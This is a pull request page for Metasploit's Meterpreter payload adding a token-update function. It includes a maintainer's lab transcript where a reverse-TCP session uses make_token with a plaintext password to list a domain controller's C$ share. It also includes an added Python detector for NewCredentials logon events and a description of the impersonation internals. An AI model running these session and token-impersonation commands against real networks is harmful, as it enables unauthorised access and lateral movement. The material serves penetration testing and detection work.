Add update_token function to stdapi #648
Review comments on c/meterpreter/source/extensions/stdapi/server/sys/config/config.c (outdated, resolved)
…ND_ID_STDAPI_SYS_CONFIG* definitions
Thanks for the changes and this submission! I tested it out with a Server 2019 instance and a couple of different logon types. Everything seems to be working as expected. As noted by the module, some logon types will cause some API calls to fail, but I don't think there's anything to do about that.
I'll go ahead and get this landed. Thanks again!
Testing Output
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer : WINDOWS-11-VM
OS : Windows 10 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 9
Meterpreter : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local
[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2023-02-10 09:59:20 -0500 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2022-08-05 15:16:50 -0400 Documents and Settings
040777/rwxrwxrwx 0 dir 2023-05-25 13:52:45 -0400 PerfLogs
040555/r-xr-xr-x 0 dir 2023-05-31 17:00:51 -0400 Program Files
040777/rwxrwxrwx 0 dir 2023-05-31 17:00:51 -0400 Program Files (x86)
040777/rwxrwxrwx 0 dir 2022-08-05 15:26:01 -0400 ProgramData
040777/rwxrwxrwx 0 dir 2022-08-05 15:16:50 -0400 Recovery
040777/rwxrwxrwx 0 dir 2023-02-10 12:53:39 -0500 System Volume Information
040555/r-xr-xr-x 0 dir 2023-02-10 09:59:14 -0500 Users
040777/rwxrwxrwx 0 dir 2023-05-30 08:36:40 -0400 Windows
100666/rw-rw-rw- 1342177280 fil 2023-06-01 08:37:35 -0400 pagefile.sys
meterpreter >
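The transcript above shows the make_token module calling LogonUserA with LOGON32_LOGON_NEW_CREDENTIALS: getuid keeps reporting MSFLAB\aliddle while the SMB listing of \\dc\C$ succeeds under the new credentials. On the host, that call is recorded as Security event 4624 with LogonType 9 (NewCredentials), the same record that runas /netonly produces. The Python below is an added example for triaging such events; it is not code from metasploit-payloads or the Metasploit framework. The event records, the process paths and the KNOWN_NETONLY_CALLERS allowlist are constructed assumptions, and the XML is shown without the Windows event namespace for brevity.

```python
"""Flag Security event 4624 records with LogonType 9 (NewCredentials).

Added example, not code from the metasploit-payloads repository. LogonUser with
LOGON32_LOGON_NEW_CREDENTIALS leaves the caller's local identity unchanged and
swaps only the credentials used for outbound network authentication, which is
exactly what the make_token transcript shows (getuid unchanged, \\dc\C$ readable).
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Iterable

NEW_CREDENTIALS_LOGON_TYPE = "9"  # LOGON32_LOGON_NEW_CREDENTIALS -> 4624 LogonType 9
# Assumed allowlist: binaries expected to request NewCredentials logons (runas /netonly).
KNOWN_NETONLY_CALLERS = {"runas.exe"}

# Constructed sample records in the Windows event XML shape (not real telemetry).
SAMPLE_EVENTS = [
    # Constructed: NewCredentials logon requested by aliddle for msflab.local\smcintyre.
    r"""<Event><System><EventID>4624</EventID><Computer>WINDOWS-11-VM</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">aliddle</Data><Data Name="SubjectDomainName">MSFLAB</Data>
      <Data Name="TargetUserName">smcintyre</Data><Data Name="TargetDomainName">msflab.local</Data>
      <Data Name="LogonType">9</Data><Data Name="LogonProcessName">Advapi  </Data>
      <Data Name="ProcessName">C:\Users\aliddle\AppData\Local\Temp\update.exe</Data>
    </EventData></Event>""",
    # Constructed: ordinary interactive logon, LogonType 2, must not be flagged.
    r"""<Event><System><EventID>4624</EventID><Computer>WINDOWS-11-VM</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">-</Data><Data Name="SubjectDomainName">-</Data>
      <Data Name="TargetUserName">aliddle</Data><Data Name="TargetDomainName">MSFLAB</Data>
      <Data Name="LogonType">2</Data><Data Name="ProcessName">C:\Windows\System32\winlogon.exe</Data>
    </EventData></Event>""",
    # Constructed: NewCredentials logon from runas.exe, the allowlisted operator case.
    r"""<Event><System><EventID>4624</EventID><Computer>WINDOWS-11-VM</Computer></System>
    <EventData>
      <Data Name="SubjectUserName">aliddle</Data><Data Name="SubjectDomainName">MSFLAB</Data>
      <Data Name="TargetUserName">svc_backup</Data><Data Name="TargetDomainName">MSFLAB</Data>
      <Data Name="LogonType">9</Data><Data Name="ProcessName">C:\Windows\System32\runas.exe</Data>
    </EventData></Event>""",
    # Constructed: a different event id, ignored by the parser.
    r"""<Event><System><EventID>4672</EventID><Computer>WINDOWS-11-VM</Computer></System>
    <EventData><Data Name="SubjectUserName">aliddle</Data></EventData></Event>""",
]


@dataclass
class NewCredentialsLogon:
    computer: str
    caller_user: str    # Subject*: the account that called LogonUser
    new_identity: str   # Target*: the credentials supplied to LogonUser
    process_name: str   # ProcessName: the process that made the call
    allowlisted: bool   # caller binary is in KNOWN_NETONLY_CALLERS


def _data(event: ET.Element, name: str) -> str:
    """Return the text of <Data Name="..."> inside EventData, or "" if absent."""
    node = event.find(f"./EventData/Data[@Name='{name}']")
    return (node.text or "").strip() if node is not None else ""


def parse_new_credentials_logons(xml_records: Iterable[str]) -> list[NewCredentialsLogon]:
    """Select 4624 events whose LogonType is 9 and extract the fields needed for triage."""
    findings: list[NewCredentialsLogon] = []
    for raw in xml_records:
        event = ET.fromstring(raw)
        if event.findtext("./System/EventID") != "4624":
            continue
        if _data(event, "LogonType") != NEW_CREDENTIALS_LOGON_TYPE:
            continue
        proc = _data(event, "ProcessName")
        basename = proc.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        findings.append(NewCredentialsLogon(
            computer=event.findtext("./System/Computer") or "",
            caller_user=f"{_data(event, 'SubjectDomainName')}\\{_data(event, 'SubjectUserName')}",
            new_identity=f"{_data(event, 'TargetDomainName')}\\{_data(event, 'TargetUserName')}",
            process_name=proc,
            allowlisted=basename in KNOWN_NETONLY_CALLERS,
        ))
    return findings


def suspicious_logons(xml_records: Iterable[str]) -> list[NewCredentialsLogon]:
    """NewCredentials logons requested by a process outside the allowlist."""
    return [f for f in parse_new_credentials_logons(xml_records) if not f.allowlisted]


if __name__ == "__main__":
    for finding in suspicious_logons(SAMPLE_EVENTS):
        print(f"{finding.computer}: {finding.caller_user} obtained NewCredentials logon as "
              f"{finding.new_identity} from {finding.process_name}")
```

A LogonType 9 record is evidence that LogonUser was called with LOGON32_LOGON_NEW_CREDENTIALS, not proof that the supplied password was valid: with that logon type the credentials are only checked on first network use, so the event fires either way. The ProcessName field is what separates an administrator's runas from an unexpected caller, which is why the parser keeps it and the allowlist keys on the binary name.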
This PR adds the request_sys_config_update_token function to the stdapi extension. We can use this function along with a token handle to update the security context of a Meterpreter session. This is achieved by:

1. Impersonating the token on the session thread (ImpersonateLoggedOnUser)
2. Storing the token handle in remote->thread_token

Point 1 should be enough to cover impersonation for any command running from the session thread (command_process_inline). Since not all commands fall into this category, point 2 ensures Meterpreter has the token handle available for other tasks creating a new thread (command_process_thread) or a new process (request_sys_process_execute).
This addition comes in combination with rapid7/metasploit-framework#18022 made in the MSF repository, which contains the ruby-side code and an example module leveraging the new update_token functionality.